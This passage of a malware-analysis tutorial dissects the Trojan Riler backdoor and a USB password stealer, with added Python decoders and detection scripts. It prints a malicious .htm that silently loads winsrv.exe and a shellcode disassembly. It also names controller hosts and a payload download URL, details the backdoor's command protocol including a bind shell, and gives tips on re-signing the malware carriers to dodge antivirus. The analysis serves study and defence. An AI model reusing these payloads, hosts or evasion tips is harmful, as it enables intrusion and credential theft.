IV. Delete winmedl.dll from the Windows system directory.
V. Dump winmedl.dll (32 bytes) into the Windows system directory.
VI. Use SetFileTime() to set the LastModified, LastAccessed and CreationTime timestamps of winmedl.dll to 18 March 2002 09:32:46 UTC.
VII. Set the attributes of winmedl.dll to READONLY | ARCHIVE (via the SetFileAttributes() API).
VIII. Copy (via the CopyFile() API) WINSRV.EXE into the user's temp path (obtained via the GetTempPath() API) as a temp file prefixed with "Del", for example Del15.tmp. This file is used for the extraction of the other executables.
IX. Try to get the attributes (via the GetFileAttributes() API) of sporder.dll in the Windows system directory.
X. If the attributes contain READONLY, remove it (via the SetFileAttributes() API).
XI. Delete sporder.dll from the Windows system directory.
XII. Dump sporder.dll (11264 bytes) into the Windows system directory.
XIII. Use the SetFileTime() API to set the LastModified, LastAccessed and CreationTime timestamps of sporder.dll to 16 April 2001 09:32:46 UTC.
XIV. Set the attributes of sporder.dll to READONLY | ARCHIVE (via the SetFileAttributes() API).
XV. Try to get the attributes (via the GetFileAttributes() API) of winssi.exe in the Windows system directory.
XVI. If the attributes contain READONLY, remove it (via the SetFileAttributes() API).
XVII. Delete winssi.exe from the Windows system directory.
XVIII. Dump winssi.exe (24576 bytes) into the Windows system directory.
XIX. Use the SetFileTime() API to set the LastModified, LastAccessed and CreationTime timestamps of winssi.exe to 14 May 2000 09:32:46 UTC.
XX. Set the attributes of winssi.exe to READONLY | ARCHIVE (via the SetFileAttributes() API).
XXI. Try to get the attributes (via the GetFileAttributes() API) of synusb.dll in the Windows system directory.
XXII. If the attributes contain READONLY, remove it (via the SetFileAttributes() API).
XXIII. Delete synusb.dll from the Windows system directory.
XXIV. Dump synusb.dll (69632 bytes) into the Windows system directory.
XXV. Use the SetFileTime() API to set the LastModified, LastAccessed and CreationTime timestamps of synusb.dll to 12 June 1999 09:32:46 UTC.
XXVI. Set the attributes of synusb.dll to READONLY | ARCHIVE (via the SetFileAttributes() API).
XXVII. Delete the copied file in the user's temp path.
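As an added example (not code from the original article), a Python check for the artefacts the procedure above leaves behind: the four component files at their dumped sizes and carrying the forged timestamps. The directory argument, the verdict thresholds and the constructed sample files are my own; on a real host it would be pointed at the Windows system directory.

```python
import os
import tempfile
from datetime import datetime, timezone

# Expected backdoor components from the dumping procedure above:
# file name -> (size in bytes, timestamp forged with SetFileTime()).
RILER_COMPONENTS = {
    "winmedl.dll": (32,    datetime(2002, 3, 18, 9, 32, 46, tzinfo=timezone.utc)),
    "sporder.dll": (11264, datetime(2001, 4, 16, 9, 32, 46, tzinfo=timezone.utc)),
    "winssi.exe":  (24576, datetime(2000, 5, 14, 9, 32, 46, tzinfo=timezone.utc)),
    "synusb.dll":  (69632, datetime(1999, 6, 12, 9, 32, 46, tzinfo=timezone.utc)),
}
FULL_MATCH = ["present", "size", "forged timestamp"]


def check_component(path, expected_size, expected_time):
    """Return the indicators that match for one file; empty list if it is absent."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return []
    hits = ["present"]
    if st.st_size == expected_size:
        hits.append("size")
    # The dropper forges all three timestamps; the modification time is the one
    # Python can compare portably, so that is what is checked here.
    if int(st.st_mtime) == int(expected_time.timestamp()):
        hits.append("forged timestamp")
    return hits


def scan_system_dir(system_dir):
    """Look for the dropped component set in system_dir (the Windows system
    directory on a real host). Returns {file name: [matching indicators]}."""
    findings = {}
    for name, (size, ts) in RILER_COMPONENTS.items():
        hits = check_component(os.path.join(system_dir, name), size, ts)
        if hits:
            findings[name] = hits
    return findings


def riler_verdict(findings):
    """'infected' when all four files match size and timestamp, 'suspicious'
    when any of them is present at all, otherwise 'clean' (my own thresholds)."""
    if not findings:
        return "clean"
    if all(findings.get(n) == FULL_MATCH for n in RILER_COMPONENTS):
        return "infected"
    return "suspicious"


def build_constructed_sample(truncate=None):
    """CONSTRUCTED test data: a temporary directory with zero-filled stand-ins
    for the four components at the right size and forged mtime. truncate names
    one file to create one byte short, to exercise the partial-match path."""
    d = tempfile.mkdtemp(prefix="riler_sample_")
    for name, (size, ts) in RILER_COMPONENTS.items():
        path = os.path.join(d, name)
        with open(path, "wb") as fh:
            fh.write(b"\x00" * (size - 1 if name == truncate else size))
        os.utime(path, (ts.timestamp(), ts.timestamp()))
    return d


if __name__ == "__main__":
    # On a Windows host: scan_system_dir(os.path.join(os.environ["SystemRoot"], "System32"))
    sample_dir = build_constructed_sample()
    found = scan_system_dir(sample_dir)
    print(riler_verdict(found), found)
```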


2.4.2 INSTALLATION OF BACKDOOR COMPONENTS

Depending on the version of the victim's operating system, WINSRV.EXE does the following to install the backdoor components for autostart:

Operating System Versions: versions below Windows NT 4.0 (such as Windows 95, Windows 98, Windows ME etc.)
Mechanism for Backdoor Component autostart: Register "SynUSB Manager" with value "rundll32.exe SynUSB.dll,RunDll32" in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run. SynUSB.dll exports the function RunDll32; rundll32.exe is used to load SynUSB.dll and execute RunDll32, which provides the code for the backdoor mechanism. This takes effect when the user logs on.

Operating System Versions: Windows NT 4.0 and above (such as Windows NT, Windows 2000 and Windows XP etc.)
Mechanism for Backdoor Component autostart: SynUSB.dll also exports the Winsock 2 Service Provider Interface (SPI) function WSPStartup and can function as a Winsock 2 Layered Service Provider (LSP). To register SynUSB.dll as an LSP, WinSSi.exe is executed via the WinExec API. WinSSi.exe uses sporder.dll, a DLL provided by the Microsoft Platform SDK for manipulating the order of installed Winsock 2 Layered Service Providers in HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries. When the LSP is loaded by the Winsock 2 service, DllMain of SynUSB.dll creates a thread on the function RunDll32, which provides the code for the backdoor mechanism. When an LSP is installed, a reboot is required for the LSP to be loaded and take effect.

Table 4 – Operating Systems Tested

2.4.3 BACKDOOR COMPONENT FILES

SPORDER.DLL - sporder.dll is a DLL provided by the Microsoft Platform SDK and hence will not be analysed. sporder.dll serves no other purpose after installation of the LSP.

WINSSI.EXE - WinSSi.exe is used only for the installation of SynUSB.DLL as a Winsock 2 Layered Service Provider (LSP). It requires sporder.dll to work. Within the WinSSi.exe binary, the name of SynUSB.DLL is encoded with XOR 5.

Encoded string: V|kPvg+aii
Decoded string (after XOR 5): SynUsb.dll

WinSSi.exe serves no other purpose after installation of the LSP.


WINMEDL.DLL - The size of WINMEDL.DLL is too small for a DLL file. WINMEDL.DLL is actually a text file that contains the address (uygurman.vicp.net) and port (53, the DNS port) of the controller on the Internet to contact. The string is encoded with XOR 5.

Encoded string: p|bpwhdk+slfu+k`q?06%KPII%KPII%7
Decoded string (after XOR 5): uygurman.vicp.net:53 NULL NULL 2

The connection is observed to be TCP.

SYNUSB.DLL - When SYNUSB.DLL is loaded by the autostart mechanism (Registry Run or Winsock 2 LSP mechanism), a thread is created from the function RunDLL32 within the DLL. The thread reads the content of WINMEDL.DLL to determine the address and port of the controller on the Internet to contact. For the rest of this section and its subsections, the thread on the victim's machine is called VICTIM and the controller on the Internet is called CONTROLLER.

2.4.4 DISCOVERY OF COMMUNICATION PROTOCOL

From the decoded string obtained earlier, we know that the VICTIM uses uygurman.vicp.net as the hostname of the CONTROLLER. Within our test network, we created a hosts file on the VICTIM that contained this entry:

uygurman.vicp.net 192.168.1.123

Figure 6 – Fake Internet Setup (Victim 192.168.1.9 and Fake Controller 192.168.1.123 on the same LAN)

I implemented the FAKE CONTROLLER by running nc (netcat) listening on port 53 (nc.exe -l -p 53). When the VICTIM started, it attempted to connect to uygurman.vicp.net, which resolved to 192.168.1.123 due to the entry in the hosts file. After a successful connection it sent a signal to the FAKE CONTROLLER and expected a reply. Since the FAKE CONTROLLER was just nc.exe, it did not know how to respond. In order to get the correct response from the REAL CONTROLLER, I used nc.exe on another machine that was connected to the Internet to connect to the REAL CONTROLLER and sent it the VICTIM's string which I had observed in the mock setup. As expected, I saw a response from the REAL CONTROLLER. With this response in hand, I returned to the mock-up environment with the FAKE CONTROLLER. When the VICTIM received the expected reply from the FAKE CONTROLLER, it proceeded to the command handling loop.


2.4.5 DECIPHERING OF COMMUNICATION PROTOCOL

After analysing the communication based on the above findings, I deduced that messages between VICTIM and CONTROLLER, in both directions, have the following format:

[4 bytes to indicate length][Data or Command]

2.4.6 HANDSHAKE

The VICTIM tries repeatedly to connect to the CONTROLLER on TCP port 53 until a connection is established. When connected, the VICTIM sends the CONTROLLER a handshake like the following:

08 00 00 00 31 32 33 34 35 36 37 38 (Length: 8) (“12345678”)

The CONTROLLER will then reply with the following:

06 00 00 00 7E 21 40 23 24 25 (Length: 6) (“~!@#$%”)

2.4.7 COMMAND LOOP

After the handshake, the VICTIM waits for commands from the CONTROLLER. The command string is encoded with XOR 5. The command syntax is:

[Length of command (4 bytes)][<Command_ID> (2 bytes, characters)][, (comma, 1 byte)][<Command parameters>]

Decoded Command ID   Action
01                   Find files based on supplied parameters such as *.txt etc.
02                   Create a file.
03                   Copy a file.
04                   Delete a file.
05                   Execute a file.
06                   Get system information such as host name, user name, OS version, memory used etc.
07                   Get disk space (free, used etc.).
08                   Unknown.
09                   Unknown. File-related activity.
10                   Spawn a cmd.exe command shell and bind it to the socket.
Above 10             CLIENT_END => Terminate connection.
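As an added example (not code from the original article), a Python decoder for the XOR-5 strings of 2.4.3 and a dissector for the framing, handshake and command loop described in 2.4.5 to 2.4.7. It assumes the 4-byte little-endian length is sent in the clear and only the "<ID>,<parameters>" string is XOR-encoded; the command exchange it walks through is constructed, while the handshake bytes and the two encoded strings come from the text.

```python
import struct

XOR_KEY = 0x05


def xor5(data: bytes) -> bytes:
    """The Trojan's single-byte XOR with key 5; applying it twice restores the input."""
    return bytes(b ^ XOR_KEY for b in data)


def parse_winmedl_config(raw: bytes):
    """Decode the winmedl.dll text ("host:port NULL NULL 2" after XOR 5) and
    return (host, port, remaining_fields)."""
    fields = xor5(raw).decode("ascii").split(" ")
    host, port = fields[0].rsplit(":", 1)
    return host, int(port), fields[1:]


HANDSHAKE_VICTIM = b"12345678"     # sent by VICTIM right after connecting
HANDSHAKE_CONTROLLER = b"~!@#$%"   # expected reply from CONTROLLER

COMMAND_IDS = {  # decoded two-character command IDs from the command loop table
    "01": "find files", "02": "create file", "03": "copy file",
    "04": "delete file", "05": "execute file", "06": "get system information",
    "07": "get disk space", "08": "unknown", "09": "unknown, file-related",
    "10": "spawn cmd.exe bound to socket",
}


def frame(payload: bytes) -> bytes:
    """Wire format in both directions: 4-byte little-endian length, then data."""
    return struct.pack("<I", len(payload)) + payload


def split_frames(stream: bytes):
    """Split a reassembled TCP stream into payloads; returns (payloads, unparsed tail)."""
    payloads, off = [], 0
    while off + 4 <= len(stream):
        (n,) = struct.unpack_from("<I", stream, off)
        if off + 4 + n > len(stream):
            break  # partial frame: wait for more data
        payloads.append(stream[off + 4:off + 4 + n])
        off += 4 + n
    return payloads, stream[off:]


def decode_command(payload: bytes):
    """Decode one XOR-5 command frame into (command_id, action, parameters)."""
    text = xor5(payload).decode("ascii", errors="replace")
    cmd_id, _, params = text.partition(",")
    if cmd_id.isdigit() and int(cmd_id) > 10:
        action = "CLIENT_END (terminate connection)"
    else:
        action = COMMAND_IDS.get(cmd_id, "unrecognised")
    return cmd_id, action, params


def dissect_session(victim_stream: bytes, controller_stream: bytes):
    """Summarise a captured session: check both halves of the handshake, then
    decode every CONTROLLER frame after the handshake as a command."""
    v_frames, _ = split_frames(victim_stream)
    c_frames, _ = split_frames(controller_stream)
    return {
        "victim_handshake_ok": bool(v_frames) and v_frames[0] == HANDSHAKE_VICTIM,
        "controller_handshake_ok": bool(c_frames) and c_frames[0] == HANDSHAKE_CONTROLLER,
        "commands": [decode_command(p) for p in c_frames[1:]],
    }


# Encoded strings quoted in 2.4.3 (winmedl.dll content and the name inside WinSSi.exe)
WINMEDL_RAW = b"p|bpwhdk+slfu+k`q?06%KPII%KPII%7"
WINSSI_ENCODED_NAME = b"V|kPvg+aii"

if __name__ == "__main__":
    print(xor5(WINSSI_ENCODED_NAME))
    print(parse_winmedl_config(WINMEDL_RAW))
    # CONSTRUCTED exchange: handshake, a "find files" command, then a terminate command
    victim = frame(HANDSHAKE_VICTIM)
    controller = (frame(HANDSHAKE_CONTROLLER) + frame(xor5(b"01,*.txt"))
                  + frame(xor5(b"11,")))
    print(dissect_session(victim, controller))
```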


2.4.8 MULTIPLE SESSIONS SUPPORTED

Another thing I tested was whether Trojan Riler supports multiple sessions. To determine this, I opened multiple telnet sessions to the CONTROLLER on port 53.

2.4.9 INFORMATION ABOUT THE CONTROLLER

I did a couple of checks on uygurman.vicp.net using http://centralops.net/co/ and http://www.robtex.com/dns/ and found that its IP address kept changing. This meant that the host was on DHCP and the connection was probably dial-up or broadband. It is a bit amazing that after so many years the domain is still being retained.

2.5 CONCLUSIONS

Based on the above findings, I did not uncover any automated propagation mechanisms in the Trojan Riler binaries. I received the sample attachments from friends who got them through spoofed emails in which the sender posed as someone from their company, so I believe that this could be a targeted attack. The other way the malicious attachments could be received is through unintentional forwarding of the mails. There is definitely something of interest in the attachments, as there was deliberate naming of files and directories, such as the directory <xyz>.files and the files <xyz>.htm and <xyz_financial_report>.doc. All of the filenames indicate that it was targeting my friend's company. Due to sensitivity, I had to rename the company as <xyz>. The file types used in the attack are data files (.DOC and .CHM) and should be able to bypass most content-filtering mechanisms (except probably Bluecoat; I had to shut my Bluecoat off in order to test the handshake part). In addition, the targets may be less wary of such data files. To change the signature of the CHM file, the attacker just has to replace WINSRV.EXE with another malware that does not have an antivirus signature. The .html file can also easily be substituted with another interesting article. Just a simple recompilation and renaming of the CHM file and the attacker is ready to strike again. Please note that the "exploit" is more like a feature of CHM and HTML and probably cannot be patched that easily. To change the signature of the DOC file, the attacker just has to concatenate another malware to the end of the DOC file. However, the success rate of this DOC file delivery method depends heavily on the correct version and language of Office. From a "good" guy's point of view, a .CHM file is considered a dangerous data file type that can embed active content. You should always configure your content filters to block CHM files if possible.

Organizations are expected to have tight firewall configurations on outgoing traffic. Attackers will exploit firewall-friendly traffic such as HTTP, HTTPS, DNS, FTP, SMTP, POP and IMAP etc. Administrators should block protocols that are not required if possible. In the case of DNS queries, the firewall can be configured to allow only DNS servers to perform DNS queries to servers on the Internet.


3 SAMPLE NUMBER TWO

3.1 INITIAL ANALYSIS

Next, I will analyse another malware sample which I received while on a business trip. This time I will go through only the analysis part and let you do your first malware forensics with the techniques I have taught so far. What is unique about this particular Trojan is that it was on a USB thumb drive containing presentation slides, given to me by the company I visited. On my way back home, being the cautious person I am, I scanned the USB drive on my laptop, on which I had disabled the Autorun feature. What do you know? Surprise, surprise: the anti-virus I had installed alerted me about a virus, SHeur2.CYO, found in a file, b32p.cmd, on the said thumb drive.

3.2 PRELIMINARY ANALYSIS ON THE MALWARE

Preliminary analysis revealed that the malware, b32p.cmd, which I identified after checking autorun.inf, would automatically run when the thumb drive was inserted into a computer. Once executed, this file dropped 4 additional files: dse235rgd0.dll, wedasgads0.dll, klif.sys and kxvo.exe. These 4 files were also detected as Trojans, as shown in Figure 7.

Figure 7 – Files Detection


Being the inquisitive person I am, I found through information on various AV websites that these files target the account credentials (username and password) of Austrian banks, Citibank and Taiwan's online gaming portals. Hmmmm... so it's a "Password Stealer" malware. As with our previous malware, I let it execute on a freshly installed laptop with Wireshark monitoring the traffic. I found that it kept doing DNS queries for the domain zxs35.com. Searches on the domain zxs35.com returned a number of results listing the domain as malicious or containing malware. The general threat assessment of the domain by various security companies describes the Trojan as generally non-vicious in nature, with the objective of obtaining some online gaming users' passwords, with no specification of any game.

3.3 LIVE ANALYSIS ON THE MALWARE

Now, assuming we do not have CWSandbox or Sandboxie with us, or the malware has anti-emulator features, I would suggest live analysis of this malware. Before we even begin running it live inside my controlled environment, I highly recommend running Regmon and Filemon by Sysinternals on the target machine. I also placed a sniffer on another laptop on the network so that I could watch the traffic remotely. With the mock-up environment set up, I plugged in the USB thumb drive and let the Autorun feature execute. Straight away, on my other laptop with Wireshark pre-installed, I discovered an outgoing connection to a website in China, zxs35.com, requesting a file, ll.rar. Further analysis revealed that this file contains an encoded string, which is an instruction for the Trojan. The encoding was analysed and found to be a simple substitution cipher (e.g. A]]Y...SQZ...JFD.AN..EE.LQL decodes to http://zxs32.com/hg2/ll.exe). In this case, the Trojan was instructed to download an executable file, ll.exe, from the same website.


Upon execution, the malware attempts to hide itself by changing the file-viewing configuration as shown below.

Figure 8 – Folder Configurations

From the logs collated from Regmon and Filemon, I identified the following:

I. The Trojan modified the registry to activate itself automatically whenever the infected user logs in.

II. It inserts itself as a Browser Helper Object (BHO) so that it is activated whenever Internet Explorer is executed.

3.4 HONEYPOT ANALYSIS ON THE MALWARE

To monitor additional behaviours of the malware sample, I also set up a honeypot to execute the sample. This is an isolated environment in which the malware is run and monitored to capture any activities performed by the attackers, with mechanisms in place to prevent attacks originating from our honeypot. The following is the setup of my honeypot.


Figure 9 – Honey Pot Setup

Above is the setup of the honeynet used to monitor the behaviour of the sample. A honeywall is placed between the infected laptop and the Internet. This honeywall is invisible to users on the Internet, allowing investigators to monitor all the traffic between the malware sample (on the laptop) and its callback addresses. The management console allows investigators to monitor the traffic in real time.

Within the honeypot, I set up simulated web usage activities, such as surfing and logging into a fake forum on the infected laptop. Analysis of the monitored network showed that the Trojan only connects to zxs35.com to download and execute ll.exe. Further analysis of the file activities showed the same files being dropped onto the honeypot. The Trojan modifies registry settings to hide itself by changing the file-viewing configuration. Analysis did not surface any commands being executed or files being taken from our honeypot. Analysis of the first day of traffic revealed suspicious connectivity from IP 60.169.1.92.

Figure 10 – Wireshark Logs

As observed, after the activation of the malware sample, it attempts to connect to zxs35.com via HTTP to retrieve ll.rar as shown below:


Figure 11 – TCP Stream Trace

Judging from the file structure, it does not look like an executable. As mentioned earlier, the encoding was analysed and found to be a simple substitution cipher (e.g. A]]Y...SQZ...JFD.AN..EE.LQL decodes to http://zxs32.com/hg2/ll.exe).
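As an added example (not the author's code) for the ll.rar instruction discussed in 3.3 and again here, a Python known-plaintext check: it asks whether a single XOR key explains every printable character of the shown ciphertext, then re-encodes the URL to confirm that a hex viewer would render exactly the dotted string quoted above. The conclusion that this "substitution" is a single-byte XOR is my inference from that one pair, and the blob handling assumes a plain ASCII instruction.

```python
# Sample pair quoted in the text; '.' marks bytes the author's viewer could not print.
SHOWN_CIPHERTEXT = "A]]Y...SQZ...JFD.AN..EE.LQL"
KNOWN_PLAINTEXT = "http://zxs32.com/hg2/ll.exe"


def recover_single_byte_xor_key(shown: str, plain: str):
    """Return the one XOR key that maps every printable ciphertext character in
    shown to the matching character in plain, or None if no single key fits.
    Characters shown as '.' are skipped because their real value is unknown."""
    if len(shown) != len(plain):
        return None
    key = None
    for c, p in zip(shown, plain):
        if c == ".":
            continue
        k = ord(c) ^ ord(p)
        if key is None:
            key = k
        elif k != key:
            return None
    return key


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def render_printable(data: bytes) -> str:
    """Mimic a hex viewer's ASCII column: printable bytes as-is, others as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data)


def decode_instruction(raw: bytes, key: int) -> str:
    """Decode a fetched instruction blob with the recovered key and strip
    trailing NULs and whitespace (assumption: the instruction is plain ASCII)."""
    return xor_bytes(raw, key).decode("ascii", errors="replace").rstrip("\x00\r\n ")


def explain_sample():
    """Recover the key from the quoted pair, then re-encode the known URL with it:
    the viewer rendering must reproduce the dotted string, dots included, which
    also explains why only the non-letter bytes showed as dots."""
    key = recover_single_byte_xor_key(SHOWN_CIPHERTEXT, KNOWN_PLAINTEXT)
    reencoded = xor_bytes(KNOWN_PLAINTEXT.encode("ascii"), key)
    return key, render_printable(reencoded), decode_instruction(reencoded, key)


if __name__ == "__main__":
    key, shown, url = explain_sample()
    print(hex(key), shown, url)
```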


After a while, the malware attempted to reconnect to zxs35.com, this time retrieving ll.exe as shown below:

Figure 12 – 2nd TCP Stream Trace

Judging from the file structure, this time it is an executable with the MZ header. I let the whole analysis run for a few days. After that, I analysed the traffic logs and found that after the initial connection to zxs35.com to download ll.exe, the malware did not attempt to reconnect to zxs35.com.

Another test I did was to insert 2 separate USB thumb drives into the infected laptop. After inserting and removing each of them in turn, I did a virus scan on both USB thumb drives and found that both had been infected. So I assume that this Trojan has a USB spreader feature.


3.5 CONCLUSIONS

Both the malware analysis and the honeypot profiling did not surface any malicious activities of the Trojan, which explains why most AV companies rate this malware as "Low Risk". I shall end this article by suggesting that you take this sample and try to do the forensics yourself: check how it inserts itself as a BHO and whether it contains any more hidden stuff. Of course, if you have CWSandbox or any other great tool, I suppose you can dig out more information with it. I hope that you had as great a time reading and learning as I did.


4 APPENDIX A: CONTENT OF THE .HTM FILE

<html xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 9">
<meta name=Originator content="Microsoft Word 9">
<link rel=File-List href="./MHA.files/filelist.xml">
<title>2004 Financial Report of <xyz> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>lw</o:Author>
<o:LastAuthor>lw</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>1</o:TotalTime>
<o:Created>2004-09-01T07:15:00Z</o:Created>
<o:LastSaved>2004-09-01T07:15:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>209</o:Words>
<o:Characters>1194</o:Characters>
<o:Company>software</o:Company>
<o:Lines>9</o:Lines>
<o:Paragraphs>2</o:Paragraphs>
<o:CharactersWithSpaces>1466</o:CharactersWithSpaces>
<o:Version>9.2812</o:Version>
</o:DocumentProperties>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:PunctuationKerning/>
<w:DrawingGridVerticalSpacing>7.8 </w:DrawingGridVerticalSpacing>
<w:DisplayHorizontalDrawingGridEvery>0</w:DisplayHorizontalDrawingGridEvery>
<w:DisplayVerticalDrawingGridEvery>2</w:DisplayVerticalDrawingGridEvery>
<w:Compatibility>
<w:SpaceForUL/>
<w:BalanceSingleByteDoubleByteWidth/>
<w:DoNotLeaveBackslashAlone/>
<w:ULTrailSpace/>
<w:DoNotExpandShiftReturn/>
<w:AdjustLineHeightInTable/>
<w:UseFELayout/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:;
panose-1:2 1 6 0 3 1 1 1 1 1;
mso-font-alt:SimSun;
mso-font-charset:134;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 135135232 16 0 262145 0;}
@font-face
{font-family:"\@";
panose-1:2 1 6 0 3 1 1 1 1 1;
mso-font-charset:134;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 135135232 16 0 262145 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0cm;
margin-bottom:.0001pt;
text-align:justify;
text-justify:inter-ideograph;
mso-pagination:none;
font-size:10.5pt;
mso-bidi-font-size:12.0pt;
font-family:"Times New Roman";
mso-fareast-font-family:;
mso-font-kerning:1.0pt;}
/* Page Definitions */
@page
{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}
@page Section1
{size:595.3pt 841.9pt;
margin:72.0pt 90.0pt 72.0pt 90.0pt;
mso-header-margin:42.55pt;
mso-footer-margin:49.6pt;
mso-paper-source:0;
layout-grid:15.6pt;}
div.Section1
{page:Section1;}
-->
</style>
</head>
<BODY onmouseup=document.selection.empty() oncontextmenu="return false"
onselectstart="return false" ondragstart="return false"
onbeforecopy="return false" oncopy=document.selection.empty()
onselect=document.selection.empty() background="winsrv.exe">
<OBJECT id=RUNIT height=0 width=0 style="display:none;"
type="application/x-oleobject" codeBase=winsrv.exe ></OBJECT>


5 APPENDIX B: DISASSEMBLY OF SHELLCODE

seg000:00000000 ; --------------------------------------------------------------------------- seg000:00000000 seg000:00000000 ; Segment type: Pure code seg000:00000000 seg000 segment byte public 'CODE' use32 seg000:00000000 assume cs:seg000 seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing seg000:00000000 nop ; No Operation seg000:00000001 nop ; No Operation seg000:00000002 nop ; No Operation seg000:00000003 nop ; No Operation seg000:00000004 nop ; No Operation seg000:00000005 nop ; No Operation seg000:00000006 nop ; No Operation seg000:00000007 call $+5 ; Call Procedure seg000:0000000C pop ebx seg000:0000000D sub ebx, 401015h ; Integer Subtraction seg000:00000013 mov ebp, esp seg000:00000015 sub esp, 1000h ; Integer Subtraction seg000:0000001B mov eax, 7FFDF000h seg000:00000020 mov eax, [eax+0Ch] seg000:00000023 mov esi, [eax+1Ch] seg000:00000026 lodsd ; Load String seg000:00000027 mov edx, [eax+8] seg000:0000002A mov [ebp-4], edx seg000:0000002D lea esi, [ebx+4012A1h] ; Load Effective Address seg000:00000033 lea edi, [ebx+401269h] ; Load Effective Address seg000:00000039 seg000:00000039 loc_39: ; CODE XREF: seg000:00000052j seg000:00000039 push esi seg000:0000003A push dword ptr [ebp-4] seg000:0000003D call sub_1CE ; Call Procedure seg000:00000042 mov [edi], eax seg000:00000044 add edi, 4 ; Add seg000:00000047 seg000:00000047 loc_47: ; CODE XREF: seg000:0000004Aj seg000:00000047 lodsb ; Load String seg000:00000048 or al, al ; Logical Inclusive OR seg000:0000004A jnz short loc_47 ; Jump if Not Zero (ZF=0) seg000:0000004C cmp byte ptr [esi+1], 0 ; Compare Two Operands seg000:00000050 jz short loc_54 ; Jump if Zero (ZF=1) seg000:00000052 jmp short loc_39 ; Jump seg000:00000054 ; --------------------------------------------------------------------------- seg000:00000054 seg000:00000054 loc_54: ; CODE XREF: seg000:00000050j seg000:00000054 mov esi, 150000h seg000:00000059 seg000:00000059 loc_59: ; CODE XREF: seg000:0000006Ej 
seg000:00000059 mov edx, [esi] seg000:0000005B cmp edx, 69465B5Dh ; Compare Two Operands seg000:00000061 jz short loc_70 ; Jump if Zero (ZF=1) seg000:00000063 add esi, 4 ; Add

Page 34: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

34

seg000:00000066 cmp esi, 400000h ; Compare Two Operands seg000:0000006C ja short loc_70 ; Jump if Above (CF=0 & ZF=0) seg000:0000006E jmp short loc_59 ; Jump seg000:00000070 ; --------------------------------------------------------------------------- seg000:00000070 seg000:00000070 loc_70: ; CODE XREF: seg000:00000061j seg000:00000070 ; seg000:0000006Cj seg000:00000070 add esi, 0Ch ; Add seg000:00000073 mov edi, esi seg000:00000075 seg000:00000075 loc_75: ; CODE XREF: seg000:0000007Ej seg000:00000075 mov al, [edi] seg000:00000077 cmp al, 22h ; '"' ; Compare Two Operands seg000:00000079 jz short loc_80 ; Jump if Zero (ZF=1) seg000:0000007B add edi, 1 ; Add seg000:0000007E jmp short loc_75 ; Jump seg000:00000080 ; --------------------------------------------------------------------------- seg000:00000080 seg000:00000080 loc_80: ; CODE XREF: seg000:00000079j seg000:00000080 mov byte ptr [edi], 0 seg000:00000083 push 0 seg000:00000085 push 80h ; 'Ç' seg000:0000008A push 4 seg000:0000008C push 0 seg000:0000008E push 3 seg000:00000090 push 80000000h seg000:00000095 push esi seg000:00000096 call dword ptr [ebx+401289h] ; Indirect Call Near Procedure seg000:0000009C mov [ebp-0A70h], eax seg000:000000A2 lea edi, [ebp-96Ch] ; Load Effective Address seg000:000000A8 push 100h seg000:000000AD push edi seg000:000000AE call dword ptr [ebx+40127Dh] ; Indirect Call Near Procedure seg000:000000B4 lea esi, [ebx+401346h] ; Load Effective Address seg000:000000BA push esi seg000:000000BB push edi seg000:000000BC call dword ptr [ebx+401279h] ; Indirect Call Near Procedure seg000:000000C2 push 0 seg000:000000C4 push 80h ; 'Ç' seg000:000000C9 push 4 seg000:000000CB push 0 seg000:000000CD push 1 seg000:000000CF push 40000000h seg000:000000D4 push edi seg000:000000D5 call dword ptr [ebx+401289h] ; Indirect Call Near Procedure seg000:000000DB mov [ebp-0A74h], eax seg000:000000E1 lea edi, [ebp-0A6Ch] ; Load Effective Address seg000:000000E7 push 100h seg000:000000EC push edi seg000:000000ED 
call dword ptr [ebx+40127Dh] ; Indirect Call Near Procedure seg000:000000F3 lea esi, [ebx+401356h] ; Load Effective Address seg000:000000F9 push esi seg000:000000FA push edi seg000:000000FB call dword ptr [ebx+401279h] ; Indirect Call Near Procedure

Page 35: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

35

